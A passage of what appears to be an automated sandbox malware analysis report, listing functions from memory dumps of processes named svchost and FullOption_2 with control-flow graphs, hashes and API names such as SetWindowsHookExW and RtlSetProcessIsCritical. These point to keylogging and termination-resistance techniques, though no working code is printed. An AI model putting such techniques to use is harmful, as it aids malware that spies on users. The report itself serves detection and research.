1028->1030 1029->1028 1030->1025 1033 7ffb4ad364fd 1032->1033 1034 7ffb4ad36503-7ffb4ad36568 call 7ffb4ad36584 1032->1034 1033->1034 1041 7ffb4ad3656f-7ffb4ad36583 1034->1041 1042 7ffb4ad3656a 1034->1042 1042->1041
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aeac5e413fb55ee8d4b5beb1daa4602b456229ab0d34a93c553e67102d920d86
                                                      • Instruction ID: bd7ed2ed0a6d29d6e5bde8ffded9393bd2a46f70d7b572b79956e6a7e9b3f5fe
                                                      • Opcode Fuzzy Hash: aeac5e413fb55ee8d4b5beb1daa4602b456229ab0d34a93c553e67102d920d86
                                                      • Instruction Fuzzy Hash: B5F1B470A0CA8D8FEBA9EF28CC557E977E1FF54310F1442AAE84DC7291DB3499458B81
                                                      Function 00007FFB4AD36E72 Relevance: .5, Instructions: 460COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1043 7ffb4ad36e72-7ffb4ad36e7f 1044 7ffb4ad36e81-7ffb4ad36e89 1043->1044 1045 7ffb4ad36e8a-7ffb4ad36f57 1043->1045 1044->1045 1048 7ffb4ad36fc3 1045->1048 1049 7ffb4ad36f59-7ffb4ad36f62 1045->1049 1050 7ffb4ad36fc5-7ffb4ad36fea 1048->1050 1049->1048 1051 7ffb4ad36f64-7ffb4ad36f70 1049->1051 1058 7ffb4ad36fec-7ffb4ad36ff5 1050->1058 1059 7ffb4ad37056 1050->1059 1052 7ffb4ad36f72-7ffb4ad36f84 1051->1052 1053 7ffb4ad36fa9-7ffb4ad36fc1 1051->1053 1054 7ffb4ad36f86 1052->1054 1055 7ffb4ad36f88-7ffb4ad36f9b 1052->1055 1053->1050 1054->1055 1055->1055 1057 7ffb4ad36f9d-7ffb4ad36fa5 1055->1057 1057->1053 1058->1059 1061 7ffb4ad36ff7-7ffb4ad37003 1058->1061 1060 7ffb4ad37058-7ffb4ad3707d 1059->1060 1067 7ffb4ad370eb 1060->1067 1068 7ffb4ad3707f-7ffb4ad37089 1060->1068 1062 7ffb4ad3703c-7ffb4ad37054 1061->1062 1063 7ffb4ad37005-7ffb4ad37017 1061->1063 1062->1060 1065 7ffb4ad3701b-7ffb4ad3702e 1063->1065 1066 7ffb4ad37019 1063->1066 1065->1065 1069 7ffb4ad37030-7ffb4ad37038 1065->1069 1066->1065 1071 7ffb4ad370ed-7ffb4ad3711b 1067->1071 1068->1067 1070 7ffb4ad3708b-7ffb4ad37098 1068->1070 1069->1062 1072 7ffb4ad370d1-7ffb4ad370e9 1070->1072 1073 7ffb4ad3709a-7ffb4ad370ac 1070->1073 1078 7ffb4ad3711d-7ffb4ad37128 1071->1078 1079 7ffb4ad3718b 1071->1079 1072->1071 1074 7ffb4ad370ae 1073->1074 1075 7ffb4ad370b0-7ffb4ad370c3 1073->1075 1074->1075 1075->1075 1077 7ffb4ad370c5-7ffb4ad370cd 1075->1077 1077->1072 1078->1079 1080 7ffb4ad3712a-7ffb4ad37138 1078->1080 1081 7ffb4ad3718d-7ffb4ad37265 1079->1081 1082 7ffb4ad37171-7ffb4ad37189 1080->1082 1083 7ffb4ad3713a-7ffb4ad3714c 1080->1083 1091 7ffb4ad3726b-7ffb4ad3727a 1081->1091 1082->1081 1084 7ffb4ad3714e 1083->1084 1085 7ffb4ad37150-7ffb4ad37163 1083->1085 1084->1085 1085->1085 1087 7ffb4ad37165-7ffb4ad3716d 1085->1087 1087->1082 1092 7ffb4ad3727c 1091->1092 1093 7ffb4ad37282-7ffb4ad372e4 call 7ffb4ad37300 1091->1093 1092->1093 1100 7ffb4ad372eb-7ffb4ad372ff 1093->1100 1101 7ffb4ad372e6 1093->1101 1101->1100
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51a9e22682ba86d67a54d1683e8a4afed71582241ad62b56ee9f95bcccdc7006
                                                      • Instruction ID: bdb5363aea006a3a429f8244ce5157ed1f4cfd9a83fe8f0062058c8f329d6e5f
                                                      • Opcode Fuzzy Hash: 51a9e22682ba86d67a54d1683e8a4afed71582241ad62b56ee9f95bcccdc7006
                                                      • Instruction Fuzzy Hash: 61E1D3B060CA4D8FEBA8EF28C8557E937E1FF54310F1442AAE84DC7291DF7499458B81
                                                      Function 00007FFB4AD320F1 Relevance: .2, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e2a624e53a2c38387a3cded6cdda95f87e0449bc4ddff9998f8d7ddfd15a07a
                                                      • Instruction ID: 85854336fb20165207d2f87f6e016671a9d6e902ee71d56b74c38a29bb724efb
                                                      • Opcode Fuzzy Hash: 1e2a624e53a2c38387a3cded6cdda95f87e0449bc4ddff9998f8d7ddfd15a07a
                                                      • Instruction Fuzzy Hash: DA510E90B1E6C90FD387BF789865276BFE8DF97219B1801FAE089CA193DD085846C346
                                                      Function 00007FFB4AD38BF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: CriticalProcess
                                                      • String ID: L_^
                                                      • API String ID: 2695349919-3397556586
                                                      • Opcode ID: bf6162497db00374440f0f71b90fdec8786772f2282781b630d5b7c7f619cd91
                                                      • Instruction ID: 73c8fe83f073ef6e7578a3275e84660c4eb125a554297318e726cf6f477e8ac8
                                                      • Opcode Fuzzy Hash: bf6162497db00374440f0f71b90fdec8786772f2282781b630d5b7c7f619cd91
                                                      • Instruction Fuzzy Hash: 2631227190CA488FDB18EF68C849BE9BBF4FF55311F14416ED08AD3682CB746846CB91
                                                      Function 00007FFB4AD39DA8 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 329 7ffb4ad39da8-7ffb4ad39daf 330 7ffb4ad39db1-7ffb4ad39db9 329->330 331 7ffb4ad39dba-7ffb4ad39e2d 329->331 330->331 334 7ffb4ad39e33-7ffb4ad39e40 331->334 335 7ffb4ad39eb9-7ffb4ad39ebd 331->335 336 7ffb4ad39e42-7ffb4ad39e7f SetWindowsHookExW 334->336 335->336 338 7ffb4ad39e81 336->338 339 7ffb4ad39e87-7ffb4ad39eb8 336->339 338->339
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: d1c1b1c89be04b9a4d4ae7daf84da81d217fa2ef2e897c3a9af76f90f35f26fa
                                                      • Instruction ID: 484f0c9fabb1fe21b7e3b0fe9c8c9308fa90e3519ea924745c9273fd4d4b4fb6
                                                      • Opcode Fuzzy Hash: d1c1b1c89be04b9a4d4ae7daf84da81d217fa2ef2e897c3a9af76f90f35f26fa
                                                      • Instruction Fuzzy Hash: 26411570A0CA1C8FDB19EF6CD8066F9BBE1EF59320F10427ED049D3692CE65A852C781
                                                      Function 00007FFB4AD3988B Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 342 7ffb4ad3988b-7ffb4ad39960 RtlSetProcessIsCritical 347 7ffb4ad39962 342->347 348 7ffb4ad39968-7ffb4ad3999d 342->348 347->348
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: CriticalProcess
                                                      • String ID:
                                                      • API String ID: 2695349919-0
                                                      • Opcode ID: dc25e606995746b3b6c1a5aa2921bcad40d554521a86c45667ffdeb8d6b51d1d
                                                      • Instruction ID: 22c7ee9b05b4abe4753897b6c88149a7375b003d617a8e93b0252b85b822d8e5
                                                      • Opcode Fuzzy Hash: dc25e606995746b3b6c1a5aa2921bcad40d554521a86c45667ffdeb8d6b51d1d
                                                      • Instruction Fuzzy Hash: 0941217090CB488FDB19EF68D8457EABBF0FF56310F0441AED08AD3692CB246846CB91

                                                      Non-executed Functions

                                                      Function 00007FFB4AD35BC9 Relevance: .4, Instructions: 413COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d884f05479396e3d25304fda57afaafe5f6cdaac6206b40b7201956f8853a2
                                                      • Instruction ID: 0d1cdc27d99631e0a964b8e3885e7699af82701c6bfdb2b49fb31ac5fbfa1be7
                                                      • Opcode Fuzzy Hash: b6d884f05479396e3d25304fda57afaafe5f6cdaac6206b40b7201956f8853a2
                                                      • Instruction Fuzzy Hash: ACD1D87060CA8D8FEBA9EF28C8557E977E1FF58300F1442AEE84DC3291CB7499418B81
                                                      Function 00007FFB4AD310A5 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 557445d459732e6abb0631a915d8f167fa05a9b82af837e0261bab324068bfb7
                                                      • Instruction ID: d4325d7269ebf60e45a17168be6980adbf786d5a8ae6bd2c3369414d8f09911f
                                                      • Opcode Fuzzy Hash: 557445d459732e6abb0631a915d8f167fa05a9b82af837e0261bab324068bfb7
                                                      • Instruction Fuzzy Hash: C051F467A0F27AE6D7127EBDF4514E97B18DF4237570882F7EA4D9D0878C04284686F1

                                                      Executed Functions

                                                      Function 00007FFB4AD20D80 Relevance: .1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1683317842.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffb4ad20000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bd4978c4f5cfcfc03b78b5748bd9cdaefe1dec65d1ad7c4056a5488b77a70f2
                                                      • Instruction ID: 263383497c18146a0b066d416fec1e26101bbff7e5e3a55108e6923c7435c392
                                                      • Opcode Fuzzy Hash: 6bd4978c4f5cfcfc03b78b5748bd9cdaefe1dec65d1ad7c4056a5488b77a70f2
                                                      • Instruction Fuzzy Hash: D93167A284E3C25FD3436B709C764A17FB0DE5722070E44EBD4C4CB5A3D51C6A9AC762
                                                      Function 00007FFB4AD20951 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1683317842.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffb4ad20000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1c9855a83b82cdd301a703d8296223d25d7b227c7a8da46c6ad5aa9027d362b
                                                      • Instruction ID: 1d770021333df160066cccadf8c6b80f931d34f86443d86804a7e482874b3ec5
                                                      • Opcode Fuzzy Hash: a1c9855a83b82cdd301a703d8296223d25d7b227c7a8da46c6ad5aa9027d362b
                                                      • Instruction Fuzzy Hash: 911132B1D04B485FEB04DF68C45A6DEBBF0EF58300F2041AAD040E7282CB349942CB52

                                                      Executed Functions

                                                      Function 00007FFB4AD1172B Relevance: .7, Instructions: 689COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14087ddb125aa51965361be27c78d60a5c6d692011be9224224a3d44a6244872
                                                      • Instruction ID: 81dbcf3c4b00d2ab9bf782acb0cfa5e92daab76dae350db52a92e19ba8a9b36d
                                                      • Opcode Fuzzy Hash: 14087ddb125aa51965361be27c78d60a5c6d692011be9224224a3d44a6244872
                                                      • Instruction Fuzzy Hash: FE22E3B1B2DA1A5FE799FF38C4692B87AD6EF98300F5405B9E40DC3287DD28AD018741
                                                      Function 00007FFB4AD10AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9O_^
                                                      • API String ID: 0-1716625314
                                                      • Opcode ID: e65b413a6a4ebf9f9ce3e042cbe0d16ff6eedab7d46d98edd7543726ca04e7e1
                                                      • Instruction ID: 3e61c1dbd67afe0d48a440220b63ee49ecd39ce37899a56c0efd9f95768c40b5
                                                      • Opcode Fuzzy Hash: e65b413a6a4ebf9f9ce3e042cbe0d16ff6eedab7d46d98edd7543726ca04e7e1
                                                      • Instruction Fuzzy Hash: 5E6125B6B0D626DAE742BF7CE0412FC3BA5EF84325B1445B6C909DB187CD24689687A0
                                                      Function 00007FFB4AD10EB8 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4O_^
                                                      • API String ID: 0-2486912895
                                                      • Opcode ID: 119079f50bff71dd2815ae6677b32ae94fdc06c4f6d9c8a9591358e977e1c6d0
                                                      • Instruction ID: 00ca78753d7b8b29496ca527bc3271a80c00f922b42df2e1a9203e3721dfeea2
                                                      • Opcode Fuzzy Hash: 119079f50bff71dd2815ae6677b32ae94fdc06c4f6d9c8a9591358e977e1c6d0
                                                      • Instruction Fuzzy Hash: 9D414CB1B1DA5A4FE396BB3CD4562B93BD6DF85221B1840FAE48DC7293DC189C438391
                                                      Function 00007FFB4AD107D3 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <O_^
                                                      • API String ID: 0-1368354704
                                                      • Opcode ID: a91304ab806ebbbcadf0509e6bd6f82ae42d93f06dfff547ac18eef615d05186
                                                      • Instruction ID: bd7816c9d31724d02e411ff3c7f85dff64e22592716e5d0a5d8a8c765c1ed1b2
                                                      • Opcode Fuzzy Hash: a91304ab806ebbbcadf0509e6bd6f82ae42d93f06dfff547ac18eef615d05186
                                                      • Instruction Fuzzy Hash: F74112B6A0E7559FD342FF7CE0A41E83FA0FF84214B4481F6D948DB29BCD245A568760
                                                      Function 00007FFB4AD10985 Relevance: .3, Instructions: 346COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba45565e1aa0a56e83a3e9ea387812b56689933088d7dcf0ddb91de1bfed0d06
                                                      • Instruction ID: 9f3909ca4d0ff0f1fd2e45ad1f0f153655b16ebee1806f6386d48010bfcc98d1
                                                      • Opcode Fuzzy Hash: ba45565e1aa0a56e83a3e9ea387812b56689933088d7dcf0ddb91de1bfed0d06
                                                      • Instruction Fuzzy Hash: A3A1547AB08A26DAD701BF7CF4412E93BA4EFC5331B0445B7C649DB187C924689B87E0
                                                      Function 00007FFB4AD109D3 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31cfd349e4c52d5664ddb84fee271a09835a00a57d29ae46eedf78240d9e0bb1
                                                      • Instruction ID: 40e87707f1500c66cecfeee63b0d7a965736d40dd2092ea87d7c6256b638abf2
                                                      • Opcode Fuzzy Hash: 31cfd349e4c52d5664ddb84fee271a09835a00a57d29ae46eedf78240d9e0bb1
                                                      • Instruction Fuzzy Hash: DB91377AB08A26DAD701BF7DF4052E93BA4EFC4331B1485B7C549DB187C924689B87E0
                                                      Function 00007FFB4AD10A08 Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 764918b42537f518ea726f3b1adfaf053301f177f0a134003729f6d6d68de3e7
                                                      • Instruction ID: 6d4306089e0e7d1f912ccc41bddfea4af07d1aecb0b8bc1205cf6c2a61233e57
                                                      • Opcode Fuzzy Hash: 764918b42537f518ea726f3b1adfaf053301f177f0a134003729f6d6d68de3e7
                                                      • Instruction Fuzzy Hash: 0181677AB08A26DAD701BF7CF4052E93BA5EFC4331B1485B7C549DB187C924689B87E0
                                                      Function 00007FFB4AD10A10 Relevance: .3, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fcfa336c1189146b0da511bcba94fabe37a5fe6c9f8442c5d92c2c3aafdffca
                                                      • Instruction ID: 3e667a0f58bc20583590f38da219c9d5fd60458a1a4adc5571bc1b552272e9f9
                                                      • Opcode Fuzzy Hash: 5fcfa336c1189146b0da511bcba94fabe37a5fe6c9f8442c5d92c2c3aafdffca
                                                      • Instruction Fuzzy Hash: 4881577AB08A26DAD701BF7CF4052E93BA5EFC4331B1485B7C549DB187C924689B87E0
                                                      Function 00007FFB4AD10A48 Relevance: .3, Instructions: 270COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0537d99155357f73b7bb11316831816fcfa1df36d145997ac81e3dc3d60fda45
                                                      • Instruction ID: 830e33523eb8b1d7afb917bcadfc7225b2952745a002251c6f639e0bd5037f88
                                                      • Opcode Fuzzy Hash: 0537d99155357f73b7bb11316831816fcfa1df36d145997ac81e3dc3d60fda45
                                                      • Instruction Fuzzy Hash: C271667AB08A26DAD701BF7CF4052E93BA5EFC4331B1445B6C549DB187C924689BC7E0
                                                      Function 00007FFB4AD10778 Relevance: .2, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d51ce8223ee23ec3cf251ff2b24b09b6f7c03d91d3a39dba8e67ac579eb47ec
                                                      • Instruction ID: 2c0cee7c33f4fe33d1719a1ab535ba86acdd394b4a3d090acf7e72e506a581cd
                                                      • Opcode Fuzzy Hash: 6d51ce8223ee23ec3cf251ff2b24b09b6f7c03d91d3a39dba8e67ac579eb47ec
                                                      • Instruction Fuzzy Hash: 67515AB2A0E7859FD342BF7CE4601E83FA0FF9120475441F6D488DB28BDD245A5687A1
                                                      Function 00007FFB4AD12188 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db18221cb500df0691e6f3b6586ab00c624825e38b6929bf146e590d8cef1bf6
                                                      • Instruction ID: dd678df9ed59fe99a5346cad1d5375b97e6e3c1e2cfd3963be6c842ebac714a5
                                                      • Opcode Fuzzy Hash: db18221cb500df0691e6f3b6586ab00c624825e38b6929bf146e590d8cef1bf6
                                                      • Instruction Fuzzy Hash: 4831E361B1CA490FE789FB7C945A378AAC2EBD8315F0401BEE84EC72D3DD289C468345
                                                      Function 00007FFB4AD10638 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a676941c3bf1a3b6fddf4fdfd472e595474f6d35275e8c119f244475cadb9ece
                                                      • Instruction ID: 65e006244ae81163af1b152e20e072863ce756e4ad61866b446f3301c6c0363e
                                                      • Opcode Fuzzy Hash: a676941c3bf1a3b6fddf4fdfd472e595474f6d35275e8c119f244475cadb9ece
                                                      • Instruction Fuzzy Hash: 9831D161B1CA480FE789FB3C945A379AAC6EBD8315F1401BEE44EC7693DE289C468345
                                                      Function 00007FFB4AD10BD7 Relevance: .1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7252f960fadd156818595d08443e4c69bbca07839dc5891f6c94bfde8fe3c6e
                                                      • Instruction ID: 1f467c8da8728a55d429250e993f555db7049a20394b94c233c8a836fe2aa66a
                                                      • Opcode Fuzzy Hash: a7252f960fadd156818595d08443e4c69bbca07839dc5891f6c94bfde8fe3c6e
                                                      • Instruction Fuzzy Hash: DA4112B1A0DA1A9FE745FF78D4552F87FB2FF98200B5444F5D408E7287CD28A85687A0
                                                      Function 00007FFB4AD10D26 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6f6c52642b8698453c163e52fd06f11cfc2a9b8df8eae2455f377f9bfc30756
                                                      • Instruction ID: 108022121086432e5341fc45c993b12a0c6c85b0844fe90b0e8f58f70f9b0e6e
                                                      • Opcode Fuzzy Hash: a6f6c52642b8698453c163e52fd06f11cfc2a9b8df8eae2455f377f9bfc30756
                                                      • Instruction Fuzzy Hash: DF3128A1B1CE4A5FF745BFBC981A3BC66D6EF98301F1401BAE40DD3686DC18AC458391
                                                      Function 00007FFB4AD10BEB Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be096ba9e1ac35224e31e5c37849eca2e493c3aef864d1c25de221a0ec043d1c
                                                      • Instruction ID: a8784b7f436c7351bc1f91e70a03ddf664ff95af4d0c372b626b674217059302
                                                      • Opcode Fuzzy Hash: be096ba9e1ac35224e31e5c37849eca2e493c3aef864d1c25de221a0ec043d1c
                                                      • Instruction Fuzzy Hash: ED31A4B0A18A1D8FEB45FFB8D4656FD7BA2FF98300F5045B4D009E3286CD38A9558750
                                                      Function 00007FFB4AD10870 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e6eba37c3257f6c1f03cbe6b80476705aad1cdccb68f4a08431311651ed2d0f
                                                      • Instruction ID: e70d6a7810a49d19f58d892617e1bd05c23d495615557872221df92d4ef653cd
                                                      • Opcode Fuzzy Hash: 3e6eba37c3257f6c1f03cbe6b80476705aad1cdccb68f4a08431311651ed2d0f
                                                      • Instruction Fuzzy Hash: D821C3B164AB499FD352FF38E0A41E97F71FF98200B8045E5D948D338ACD345E218761
                                                      Function 00007FFB4AD122C1 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
